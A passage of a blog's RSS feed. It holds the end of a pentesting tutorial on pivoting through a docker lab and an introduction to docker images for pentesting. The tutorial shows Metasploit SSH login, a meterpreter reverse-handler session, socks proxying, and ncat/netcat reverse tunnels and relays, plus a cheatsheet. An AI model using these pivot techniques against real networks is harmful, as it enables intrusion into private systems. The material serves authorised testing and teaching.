<h3 id="run-commands">Run Commands</h3>
<p>Here is an nmap scan of the webgoat host. Note I use the network &#8220;webgoat&#8221; because the docker-compose network sets up this dns name. You could use any normal ip range on the target network instead.</p>
<pre class=" language-bash"><code class=" language-bash">$ proxychains nmap -sV webgoat
Nmap scan report <span class="token keyword">for</span> webgoat <span class="token punctuation">(</span>224.0.0.1<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.00027s latency<span class="token punctuation">)</span>.
rDNS record <span class="token keyword">for</span> 224.0.0.1: all-systems.mcast.net
Not shown: 998 closed ports
PORT     STATE SERVICE    VERSION
8080/tcp <span class="token function">open</span>  http-proxy
9001/tcp <span class="token function">open</span>  jdbc       HSQLDB JDBC <span class="token punctuation">(</span>Network Compatibility Version 2.3.4.0<span class="token punctuation">)</span>
</code></pre>
<h2 id="method-2-pivot-with-meterpreter-and-socks-proxy">Method 2: Pivot With Meterpreter and socks proxy</h2>
<p>Some servers don&#8217;t run SSH, and I often like to leverage meterpreter once I find an initial entry vector for a variety of reasons. Similar to SSH, meterpreter can become a socks proxy, though I have generally found it less reliable than SSH. If you are using the docker compose file provided, I include a slightly modified metasploit image on the public network.</p>
<p>Unfortunately, socks4 proxies only generally support TCP protocols, and certain kinds of traffic won&#8217;t work well, so full nmap and similar tool usage may not be possible.</p>
<h3 id="setup-the-connection">Setup the connection</h3>
<p>We&#8217;ll run meterpreter over SSH for this example, but the steps would be the same for any meterpreter session once connected. The below will jump from our machine into the metasploit docker container, start metasploit, and create a meterpreter over SSH connection.</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token comment"># Create a shell on the metasploit image</span>
$ docker <span class="token function">exec</span> -it pivots_metasploit_1 /bin/bash
root@3456fe097a17:/$ msfconsole
msf5 <span class="token operator">&gt;</span> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token keyword">set</span> RHOSTS <span class="token function">ssh</span>
RHOSTS <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token function">ssh</span>
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token keyword">set</span> USERNAME pentester
USERNAME <span class="token operator">=</span><span class="token operator">&gt;</span> pentester
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token keyword">set</span> PASSWORD letspivot
PASSWORD <span class="token operator">=</span><span class="token operator">&gt;</span> letspivot
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> exploit

<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 172.21.0.2:22 - Success: <span class="token string">'pentester:letspivot'</span> <span class="token string">''</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Command shell session 1 opened <span class="token punctuation">(</span>172.21.0.3:42077 -<span class="token operator">&gt;</span> 172.21.0.2:22<span class="token punctuation">)</span> at 2019-09-19 12:50:57 +0000
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Scanned 1 of 1 hosts <span class="token punctuation">(</span>100% complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Auxiliary module execution completed

msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> sessions

Active sessions
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>

  Id  Name  Type           Information                              Connection
  --  ----  ----           -----------                              ----------
  1         shell unknown  SSH pentester:letspivot <span class="token punctuation">(</span>172.21.0.2:22<span class="token punctuation">)</span>  172.21.0.3:42077 -<span class="token operator">&gt;</span> 172.21.0.2:22 <span class="token punctuation">(</span>172.21.0.2<span class="token punctuation">)</span>

msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> sessions -u 1
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Executing <span class="token string">'post/multi/manage/shell_to_meterpreter'</span> on session<span class="token punctuation">(</span>s<span class="token punctuation">)</span>: <span class="token punctuation">[</span>1<span class="token punctuation">]</span>

<span class="token punctuation">[</span><span class="token operator">!</span><span class="token punctuation">]</span> SESSION may not be compatible with this module.
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Upgrading session ID: 1
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Starting exploit/multi/handler
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Started reverse TCP handler on 172.21.0.3:4433 
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Sending stage <span class="token punctuation">(</span>985320 bytes<span class="token punctuation">)</span> to 172.21.0.2
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Meterpreter session 2 opened <span class="token punctuation">(</span>172.21.0.3:4433 -<span class="token operator">&gt;</span> 172.21.0.2:57642<span class="token punctuation">)</span> at 2019-09-19 12:51:09 +0000
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Command stager progress: 100.00% <span class="token punctuation">(</span>773/773 bytes<span class="token punctuation">)</span>
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> sessions

Active sessions
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>

  Id  Name  Type                   Information                                            Connection
  --  ----  ----                   -----------                                            ----------
  1         shell unknown          SSH pentester:letspivot <span class="token punctuation">(</span>172.21.0.2:22<span class="token punctuation">)</span>                172.21.0.3:42077 -<span class="token operator">&gt;</span> 172.21.0.2:22 <span class="token punctuation">(</span>172.21.0.2<span class="token punctuation">)</span>
  2         meterpreter x86/linux  uid<span class="token operator">=</span>1000, gid<span class="token operator">=</span>1000, euid<span class="token operator">=</span>1000, egid<span class="token operator">=</span>1000 @ 172.20.0.2  172.21.0.3:4433 -<span class="token operator">&gt;</span> 172.21.0.2:57642 <span class="token punctuation">(</span>172.21.0.2<span class="token punctuation">)</span>
</code></pre>
<p>One slight complication with the docker setup I am showing is the networking. I have setup two internal docker networks, public and private, which in my examples are 172.20.0.0/24 (private) and 172.21.0.0/24 (public). Normally you would use the meterpreter session to enumerate network access, but I am going to skip that here and just setup a proxy to the private network.</p>
<h3 id="setup-and-run-a-socks-proxy-over-meterpreter">Setup and run a socks proxy over meterpreter</h3>
<p>Here we add a route to the private network and setup a socks proxy. I change the meterpreter port to the default proxychains port, but you could also use the default port and update /etc/proxychains.conf with the new route if desired.</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token comment"># In Metasploit</span>
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> route add 172.20.0.0/24 2
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Route added
msf5 auxiliary<span class="token punctuation">(</span>scanner/ssh/ssh_login<span class="token punctuation">)</span> <span class="token operator">&gt;</span> use auxiliary/server/socks4a
msf5 auxiliary<span class="token punctuation">(</span>server/socks4a<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token keyword">set</span> SRVPORT 9050
SRVPORT <span class="token operator">=</span><span class="token operator">&gt;</span> 9050
msf5 auxiliary<span class="token punctuation">(</span>server/socks4a<span class="token punctuation">)</span> <span class="token operator">&gt;</span> run -j
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Auxiliary module running as background job 3.

<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Starting the socks4a proxy server
msf5 auxiliary<span class="token punctuation">(</span>server/socks4a<span class="token punctuation">)</span> <span class="token operator">&gt;</span> 

<span class="token comment">### Now in a separate command window, I will create a new session</span>
<span class="token comment">### on the meterpreter container to use nmap and proxychains</span>
$ docker <span class="token function">exec</span> -it pivots_metasploit_1 /bin/bash
root@ffd95ec9ce94:/$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.3
ProxyChains-3.1 <span class="token punctuation">(</span>http://proxychains.sf.net<span class="token punctuation">)</span>

Starting Nmap 7.60 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2019-09-19 13:08 UTC
<span class="token operator">|</span>S-chain<span class="token operator">|</span>-<span class="token operator">&lt;</span><span class="token operator">&gt;</span>-127.0.0.1:9050-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.20.0.3:8080-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-OK
<span class="token operator">|</span>S-chain<span class="token operator">|</span>-<span class="token operator">&lt;</span><span class="token operator">&gt;</span>-127.0.0.1:9050-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.20.0.3:9001-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-OK
Nmap scan report <span class="token keyword">for</span> 172.20.0.3
Host is up <span class="token punctuation">(</span>0.0025s latency<span class="token punctuation">)</span>.

PORT     STATE SERVICE
8080/tcp <span class="token function">open</span>  http-proxy
9001/tcp <span class="token function">open</span>  tor-orport

Nmap done: 1 IP address <span class="token punctuation">(</span>1 <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 0.11 seconds

</code></pre>
<p>We have a scan! Note that only a limited number of port scan types work with this method (mostly Syn scans) and I find it tends to be quite slow, so it pays to limit the range of IP&#8217;s and ports.</p>
<h2 id="method-3-pivot-over-a-ncat-or-netcat-relay">Method 3: Pivot over a Ncat or Netcat relay</h2>
<p>If ncat or netcat are installed on the target (they are usually removed during hardening on modern systems), or if you install it yourself on the target, it can be used to setup a tunnel.</p>
<p>Ncat is a good proxy tool from the nmap project, but netcat relays are the least reliable method mentioned here. They may work only for a single request before having to be re-established (or establishing them in a loop on the target machine), and will not work on more than a single port. However, sometimes netcat is all you can use.</p>
<h3 id="tunnel-as-http-proxy-with-ncat">Tunnel as http proxy with ncat</h3>
<p>ncat can be setup as an http proxy which can be used similar to a socks proxy. Just run the ncat proxy on the target machine, and update the local proxychains config to use an http proxy.</p>
<p>Unfortunately, ncat is almost never going to be installed by default on a target machine, unless someone has also installed nmap there.</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token comment">## Target machine - setup ncat listener </span>
pentester@47ab62bc2f3d:~$ ncat -vv --listen 3128 --proxy-type http
Ncat: Version 7.60 <span class="token punctuation">(</span> https://nmap.org/ncat <span class="token punctuation">)</span>
Ncat: Listening on :::3128
Ncat: Listening on 0.0.0.0:3128

<span class="token comment">## attacker machine (metasploit)</span>
root@12f888991729:/$ <span class="token function">tail</span> /etc/proxychains.conf -n 3
<span class="token comment"># defaults set to "tor"</span>
<span class="token comment">#socks4 	127.0.0.1 9050</span>
http 172.21.0.3  3128 <span class="token comment"># 172.21.0.3 is the IP of my ssh machine</span>

root@12f888991729:/$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.2
ProxyChains-3.1 <span class="token punctuation">(</span>http://proxychains.sf.net<span class="token punctuation">)</span>

Starting Nmap 7.60 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2019-09-19 14:26 UTC
<span class="token operator">|</span>S-chain<span class="token operator">|</span>-<span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.21.0.3:3128-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.20.0.2:8080-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-OK
<span class="token operator">|</span>S-chain<span class="token operator">|</span>-<span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.21.0.3:3128-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-172.20.0.2:9001-<span class="token operator">&lt;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">&gt;</span>-OK
Nmap scan report <span class="token keyword">for</span> 172.20.0.2
Host is up <span class="token punctuation">(</span>0.00057s latency<span class="token punctuation">)</span>.

PORT     STATE SERVICE
8080/tcp <span class="token function">open</span>  http-proxy
9001/tcp <span class="token function">open</span>  tor-orport

Nmap done: 1 IP address <span class="token punctuation">(</span>1 <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 0.08 seconds</code></pre>
<h3 id="reverse-tunnel-a-single-port-with-ncat">Reverse tunnel a single port with ncat</h3>
<p>ncat can also be used to tunnel a single port. In this case, we are using a reverse reach back to connect from target -&gt; attacker. This may be required with some network setups that block incoming connections but allow outgoing.</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token comment"># On attacker / metasploit machine</span>
$ docker <span class="token function">exec</span> -it pivots_metasploit_1 /bin/bash
root@12f888991729:/$ ncat -lv --broker -m2 8080
Ncat: Version 7.60 <span class="token punctuation">(</span> https://nmap.org/ncat <span class="token punctuation">)</span>
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: DDD9 4DF0 A7D6 3F08 DB62 51C7 4358 04C6 81BF F05A
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080

<span class="token comment"># On ssh / box to pivot from</span>
$ <span class="token function">ssh</span> pentester@localhost -p 20022
pentester@localhost's password: 
pentester@47ab62bc2f3d:~$ ncat -v metasploit 8080 -c <span class="token string">"ncat -v webgoatlocal 8080"</span>
Ncat: Version 7.60 <span class="token punctuation">(</span> https://nmap.org/ncat <span class="token punctuation">)</span>
Ncat: Connected to 172.21.0.2:8080.

<span class="token comment">## Attacker machine on a separate bash session - use wget to retrieve page</span>
<span class="token comment">## I use nmap here, but I can only scan port 8080.</span>
root@12f888991729:/$ nmap -sS -P0 -p8080 localhost

Starting Nmap 7.60 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2019-09-19 13:54 UTC
Nmap scan report <span class="token keyword">for</span> localhost <span class="token punctuation">(</span>127.0.0.1<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.000098s latency<span class="token punctuation">)</span>.
Other addresses <span class="token keyword">for</span> localhost <span class="token punctuation">(</span>not scanned<span class="token punctuation">)</span>: ::1

PORT     STATE SERVICE
8080/tcp <span class="token function">open</span>  http-proxy

Nmap done: 1 IP address <span class="token punctuation">(</span>1 <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 0.35 seconds
</code></pre>
<h3 id="tunnel-with-netcat">Tunnel with netcat</h3>
<p>Netcat is similar, but the connection will close on a variety of conditions and need to be restarted, generally after a full connection, including one full HTTP request.</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token comment"># Make backpipe to pass data around</span>
<span class="token function">mknod</span> pivot p
<span class="token comment"># Setup the listener on pivot machine - forward traffic the</span>
<span class="token comment"># pivot machine receives on port 8080 to the webgoat server </span>
<span class="token comment"># port 8080</span>
<span class="token function">nc</span> -l -p 8080 0<span class="token operator">&lt;</span>pivot <span class="token operator">|</span> <span class="token function">nc</span> webgoatlocal 8080 1<span class="token operator">&gt;</span>pivot

<span class="token comment">## On attacker machine (metasploit)</span>
root@12f888991729:/$ <span class="token function">wget</span> ssh:8080/WebGoat
Saving to: ‘WebGoat'
</code></pre>
<h2 id="method-4-installing-tools-on-the-target-machine">Method 4: Installing tools on the target machine</h2>
<p>If you are willing to install tools on the target machine, you could install various command line tools (or even visual desktop servers like VNC) and use the pivot box as a &#8220;new&#8221; attacker machine. This is sometimes the way to go if installing tools on such a device is allowable in the rules of engagement.</p>
<p>One additional proxy tool I will mention under this category is <a href="https://github.com/z3APA3A/3proxy">3proxy</a>, a swiss army knife of a proxy with tons of options. Unfortunately, for linux hosts you will need to build a static binary to deploy (or attempt to build on the target), so is a little less simple to get running.</p>
<h2 id="a-quick-pivot-cheatsheet">A Quick Pivot CheatSheet</h2>
<p>All of these methods are potentially limited by the permissions on the proxy host &#8211; non-root users for instance cannot perform certain types of scans over the proxy.</p>
<h2 id="ssh-pivot">SSH pivot</h2>
<pre class=" language-bash"><code class=" language-bash"><span class="token function">ssh</span> -D localhost:<span class="token operator">&lt;</span>local_proxy_port<span class="token operator">&gt;</span> -f -N <span class="token operator">&lt;</span>user<span class="token operator">&gt;</span>@<span class="token operator">&lt;</span>machine_to_pivot<span class="token operator">&gt;</span>
</code></pre>
<h2 id="metasploit-with-meterpreter">Metasploit with Meterpreter</h2>
<pre class=" language-bash"><code class=" language-bash">msf5 <span class="token operator">&gt;</span>route add <span class="token operator">&lt;</span>network_to_proxy_in_CIDR_notation<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>meterpreter_session_id<span class="token operator">&gt;</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Route added
msf5 <span class="token operator">&gt;</span> use auxiliary/server/socks4a
msf5 auxiliary<span class="token punctuation">(</span>server/socks4a<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token keyword">set</span> SRVPORT 9050
SRVPORT <span class="token operator">=</span><span class="token operator">&gt;</span> 9050
msf5 auxiliary<span class="token punctuation">(</span>server/socks4a<span class="token punctuation">)</span> <span class="token operator">&gt;</span> run -j
</code></pre>
<h2 id="ncat-http-proxy">Ncat HTTP proxy</h2>
<pre class=" language-bash"><code class=" language-bash">$ ncat -vv --listen 3128 --proxy-type http
</code></pre>
<h2 id="ncat-port-forwarder">Ncat Port Forwarder</h2>
<p>On attacker machine:</p>
<pre class=" language-bash"><code class=" language-bash">$ ncat -lv --broker -m2 <span class="token operator">&lt;</span>port<span class="token operator">&gt;</span>
</code></pre>
<p>On pivot machine:</p>
<pre class=" language-bash"><code class=" language-bash">$ ncat -v <span class="token operator">&lt;</span>attacker_ip<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>attacker_port<span class="token operator">&gt;</span> -c <span class="token string">"ncat -v &lt;host_to_pivot_to&gt; &lt;port_on_final_target"</span>
</code></pre>
<h2 id="netcat-port-forwarder">Netcat Port Forwarder</h2>
<p>On pivot machine:</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token function">mknod</span> pivot p
<span class="token function">nc</span> -l -p <span class="token operator">&lt;</span>port_to_listen_on<span class="token operator">&gt;</span> 0<span class="token operator">&lt;</span>pivot <span class="token operator">|</span> <span class="token function">nc</span> <span class="token operator">&lt;</span>ip_to_pivot_to<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>port_to_pivot_to<span class="token operator">&gt;</span> 1<span class="token operator">&gt;</span>pivot
</code></pre>
<h2 id="proxychains-setup">Proxychains Setup</h2>
<p>Install and configure proxychains</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token function">tail</span> /etc/proxychains.conf
<span class="token comment">#socks4 	127.0.0.1 9050</span>
http 172.21.0.3  3128
<span class="token comment">#&lt;type: http/socks4/socks5&gt; &lt;proxy_host&gt; &lt;proxy_port&gt;</span>
</code></pre>
<h1 id="conclusions">Conclusions</h1>
<p>Pivoting is important to know when pentesting networks that have private components, and these techniques are an important consideration when designing network topology. Watching externally facing hosts and jump boxes for pivot techniques is one way to halt attackers at an earlier stage.</p>
<p>The post <a href="http://kostacipo.stream/a-pivot-cheatsheet-for-pentesters/">A Pivot Cheatsheet for Pentesters</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/a-pivot-cheatsheet-for-pentesters/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Docker For Pentesting And Bug Bounty Hunting</title>
		<link>http://kostacipo.stream/docker-for-pentesting-and-bug-bounty-hunting/</link>
					<comments>http://kostacipo.stream/docker-for-pentesting-and-bug-bounty-hunting/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 30 Dec 2019 09:58:15 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[DevOps]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[docker]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1602</guid>

					<description><![CDATA[<p>&#160; What is Docker? Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels. Docker allows you to build and [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/docker-for-pentesting-and-bug-bounty-hunting/">Docker For Pentesting And Bug Bounty Hunting</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<header class="entry-header"></header>
<div class="entry-content">
<p><iframe loading="lazy" title="Docker For Pentesting And Bug Bounty Hunting" src="https://www.youtube.com/embed/5G6tA8Q9AuQ?feature=oembed" allowfullscreen="allowfullscreen" data-mce-fragment="1" width="720" height="405" frameborder="0"></iframe></p>
<h2>What is Docker?</h2>
<p>Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels.</p>
<ul>
<li>Docker allows you to build and deploy applications and services in the form of containers.</li>
<li>It is a platform as a service offering that utilizes the host OS&nbsp; Kernel as opposed to a traditional VM, where OS’s have to be installed for every virtual machine.</li>
<li>The containers contain the dependencies and libraries that that application or service needs to run, therefore eliminating the need for installing dependencies manually.</li>
<li>Docker containers are much more efficient than VM’s as they utilize the host OS.</li>
</ul>
<h2>Docker vs VM’s</h2>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-5796" src="https://hsploit.com/wp-content/uploads/2019/12/Blog.-Are-containers-..VM-Image-1-1024x435-1-300x127.png" sizes="auto, (max-width: 702px) 100vw, 702px" srcset="https://hsploit.com/wp-content/uploads/2019/12/Blog.-Are-containers-..VM-Image-1-1024x435-1-300x127.png 300w, https://hsploit.com/wp-content/uploads/2019/12/Blog.-Are-containers-..VM-Image-1-1024x435-1-768x326.png 768w, https://hsploit.com/wp-content/uploads/2019/12/Blog.-Are-containers-..VM-Image-1-1024x435-1.png 1024w" alt="" width="702" height="297"></p>
<p>As you can see in the image, docker is much more efficient both in terms of setup time and resource consumption, as there are fewer layers that need to be virtualized. Additionally, docker can be installed and setup on all operating systems from Windows to Linux. The latter being the proffered deployment option for developers and DevOps teams.</p>
<h2>Installing Docker on Linux</h2>
<p>Docker can easily be installed on a multitude of Linux distributions, both through scripts or package managers. You can find the specific installation instructions on the docker documentation page found at:&nbsp;<a href="https://docs.docker.com/">https://docs.docker.com</a>.</p>
<p>You can install docker directly with the aptitude package manager on Ubuntu by running the following commands in the terminal:</p>
<blockquote>
<p>sudo apt-get install docker.io docker docker-engine</p>
</blockquote>
<p>Alternatively, you can follow the instructions provided by docker:&nbsp;<a href="https://docs.docker.com/install/linux/docker-ce/ubuntu/">https://docs.docker.com/install/linux/docker-ce/ubuntu/</a></p>
<p>After you have installed docker you should enable the service to be run on system startup, this can be done by utilizing systemd in the terminal:</p>
<blockquote>
<p>sudo systemctl enable docker</p>
</blockquote>
<p>After the service has been enabled, you can now start the docker service in the terminal to begin working with docker:</p>
<blockquote>
<p>sudo systemctl start docker</p>
</blockquote>
<p>You can now test docker by running a simple command that will display active containers:</p>
<blockquote>
<p>docker ps</p>
</blockquote>
<p>Since you do not have any active containers, we will not get any output.</p>
<p>Now that we have docker setup and running, we can begin working with docker images and containers.</p>
<h2>Images &amp; Containers</h2>
<p>Images in docker are packaged services or environments and docker containers are the running/active instances of these images. A simple analogy that explains this is that of a typical VM infrastructure, where the ISO is the image and the VM is the container.</p>
<p>We can access the multitude of docker images publicly available at:&nbsp;<a href="https://hub.docker.com/">https://hub.docker.com</a>. Here you will find all the most popular services and technologies packaged up in to convenient images for rapid and scale able deployment. For example, you can search find a MySQL image that will automatically deploy a MySQl database in seconds.</p>
<h2>Docker For Penetration Testing</h2>
<p>Now that we have an understanding of how docker images and containers work, we can now get started by pulling an image and running it as a container with docker. In this case we can try out the pre-built penetration testing OS images from Kali or Parrot. We also have vulnerable web apps that have been dockerized for easy and rapid deployment, for example, the OWASP Juice Shop project. Plenty of other dockerized images that can be used for pentesting and learning can be found on the docker hub.</p>
<p>To pull an image from the docker hub we can use the pre-set docker pull command on the docker repo page, this will download the image on your host for deployment, for example, we can pull the offical Kali Linux docker image by using the following command:</p>
<blockquote>
<p>docker pull kalilinux/kali-linux-docker</p>
</blockquote>
<p>After the image has been pulled, we can confirm that it has been saved by accessing our local docker images, this can be done by running the following command:</p>
<blockquote>
<p>docker images</p>
</blockquote>
<p>This will display all our downloaded/saved images that we can deploy instantly. It also gives us vital information about the image like, the repository name, the image ID and the size. To create a container from an image we need to run the following commands:</p>
<blockquote>
<p>docker run -it –rm kalilinux/kali-linux-docker /bin/bash</p>
</blockquote>
<p>This will run a kali linux container with an interactive terminal session with bash. The syntax above and other options are specified below.</p>
<ul>
<li>-it&nbsp; – Interactive Terminal</li>
<li>-d&nbsp; – Detached mode (This will run the container in the background)</li>
<li>–rm – Cleanup (This will delete the container after it has been put in an exited state.</li>
</ul>
<p>After running the run command, we will be logged in to the Kali docker container with bash. We can now utilize the Kali repositories to install the various pen-testing tools that we require, this is because the Kali image does not contain any pre-installed tools. This is one of the disadvantages of running pen-testing images from Kali, they assumes that docker can only be used to run a single tool or toolkit, whereas the technology can be leveraged to achieve a much more complete experience.</p>
<p>It is for this reason that i decided to undertake the process of building my own docker image that would contain all the necessary and important tools that are required for penetration testing or bug bounty hunting.</p>
<h2>The Bug Bounty Toolkit</h2>
<p>This is a multi-platform bug bounty toolkit that can be installed on Debian/Ubuntu or setup with Docker and offers all the popular tools that are used for pentesting and bug bounty hunting. The toolkit has been dockerized to utilize the reliability of docker when deploying environments. It can be pulled directly from our repository here:&nbsp;<a href="https://hub.docker.com/r/hackersploit/bugbountytoolkit">https://hub.docker.com/r/hackersploit/bugbountytoolkit.</a></p>
<p>You can also check out the installer script that has been designed to automatically install the tools on an Ubuntu/Debian based distribution, this can be found on the official Github repository:&nbsp;<a href="https://github.com/AlexisAhmed/BugBountyToolkit">https://github.com/AlexisAhmed/BugBountyToolkit</a>&nbsp;where you can access and modify the Dockerfile to create a customized docker image.</p>
<p>Pulling and running the docker image is similar to running the Kali image, we can pull the image directly by using the following command in the terminal:</p>
<blockquote>
<p>docker pull hackersploit/bugbountytoolkit</p>
</blockquote>
<p>After the image has been pulled, we can create and run a container by running the following command in the terminal:</p>
<blockquote>
<p>docker run -it –rm hackersploit/bugbountytoolkit /bin/bash</p>
</blockquote>
<p>This will start the container and provide access through the specified shell. You can now run all your favorite tools on multiple containers with deployment times of less than 5 seconds.</p>
<h2>Running Multiple Sessions</h2>
<p>You can run multiple sessions/tools on the same container by utilizing the&nbsp;<em><strong>exec</strong></em>&nbsp;command. You can use the&nbsp;<em><strong>exec</strong></em>&nbsp;command to deploy more than one session for each container. This can be done by running the following command for every new session:</p>
<blockquote>
<p>docker exec -it hackersploit/bugbountytoolkit /bin/bash</p>
</blockquote>
<h2>Appendix</h2>
<p>If you would like to run docker on Windows, you can watch this video on the subject where the installation process and the various requirements needed for running docker on Windows systems are covered.</p>
<p><iframe loading="lazy" title="Docker For Pentesting On Windows [Cybersecurity]" src="https://www.youtube.com/embed/8luFiVJxg_I?feature=oembed" allowfullscreen="allowfullscreen" data-mce-fragment="1" width="720" height="405" frameborder="0"></iframe></p>
<p>&nbsp;</p>
</div>
<p>The post <a href="http://kostacipo.stream/docker-for-pentesting-and-bug-bounty-hunting/">Docker For Pentesting And Bug Bounty Hunting</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/docker-for-pentesting-and-bug-bounty-hunting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
